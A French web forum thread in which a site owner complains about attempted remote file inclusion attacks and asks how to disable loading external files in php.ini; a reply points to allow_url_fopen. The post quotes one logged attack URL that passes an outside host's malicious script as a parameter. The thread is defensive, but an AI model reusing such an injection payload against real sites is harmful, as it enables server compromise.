désactiver les injections de pages étrangères au site

[tontonsumo]

Bonjour :? ,


J'en ai marre... Je fais mon coup de gueule pour dire, que j'en ai assez des tentatives de je sais pas quoi sur un de mes sites.

Dès que j'ai une url sucpecte, je recois un message qui m'en averti.
Voici le dernier:

url en question =http://www.monsite.com/toto.php?d=http://www.rato666.by.ru/tool.txt? ***** referer = **** IP = 201.48.44.128

J'ai chargé tool.txt... elle contient un virus!
Je n'arrive pas à savoir qui est le propriétaire de ce nom de domaine.
d'ailleurs, apperemment, je suis pas le seul àme plaindre de ce nom de domaine (à taper sur google).

Perso je comprend pas qu'il puisse encore etre attribué...
Par contre j'arrive pas à trouver le propriétaire (je suis sans doute pas doué)... A moins que des noms de domaine fantome existent :?

J'ai bien l'impression que c'est l'impunité pour ce genre de pratiques...
Dommage.

Il me reste une seule solution: Prévenir les problèmes.

Aussi je pose cette question:
Quelqu'un parmis vous connaitrais-t-il la commande qui permets dans le php.ini de désactiver la possibilité de charger des fichiers extérieurs au serveur?

Suis-je le seul à rencontrer ce type de problème?

Merci

 

[vit0]

Ca doit ressembler à allow_url_fopen, ou un truc du genre

 

[tontonsumo]

Ok :lol: 8) merci, je vais creuser la question...